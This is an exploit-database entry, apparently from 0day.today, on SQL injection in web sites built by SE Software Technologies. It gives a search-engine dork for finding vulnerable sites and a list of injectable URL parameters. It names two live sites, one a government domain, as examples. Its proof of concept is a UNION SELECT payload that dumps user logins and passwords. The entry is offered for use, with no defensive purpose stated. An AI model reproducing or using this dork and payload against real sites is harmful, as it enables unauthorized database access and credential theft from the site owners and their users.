Lucene search

K
zdt^Xecuti0N3r1337DAY-ID-15981
HistoryApr 29, 2011 - 12:00 a.m.

SE Software Technologies Sensitive Database Disclosure

2011-04-2900:00:00
^Xecuti0N3r
0day.today
69

Exploit for php platform in category web applications

#(+)Exploit Title: SE Software Technologies Sensitive Database Disclosure Vulnerability
#(+)Author   : ^Xecuti0n3r
#(+) E-mail  :  xecuti0n3r()yahoo.com
#(+) dork    : intext:"Powered By : SE Software Technologies" filetype:php
#(+) Category  : Web Apps [SQli]

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm ^Xecuti0n3r member from Inj3ct0r Team              1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
  
____________________________________________________________________
____________________________________________________________________
  
Choose any site that comes up when you enter the dork intext:"Powered By : SE Software Technologies" filetype:php in search engine
  
  
    *SQL injection Vulnerability*

#      [+]http://site.com/files.php?id='5
#      [+]http://site.com/files.php?id=[SQLi]
#      [+]http://site.com/page.php?data='27
#      [+]http://site.com/page.php?data=[SQLi]
#      [+]http://site.com/details.php?product_id='786
#      [+]http://site.com/setails.php?product_id=[SQLi]
#      [+]http://site.com/contactus.php?data='5
#      [+]http://site.com/contactus.php?data=[SQLi]

Using the Dork  we can find quite a lot of sites using this Designer with the same vulnerability..
Couple of Examples being:
http://www.holzbau-boes.de/page.php?data='69
http://www.multan.gov.pk/files.php?id='5
etc..

#POC: http://site.com/files.php?id=-5 union select 1,group_concat(user_id,0x3a,login,0x3a,password)+from+users--
____________________________________________________________________
____________________________________________________________________
  
########################################################################
(+)Exploit Coded by: ^Xecuti0N3r 
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
(+)Gr33ts to : Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) + All the 31337 Members :)
(+)<3 to :Indian Cyber Army & Indishell Crew
##################################################################



#  0day.today [2017-12-31]  #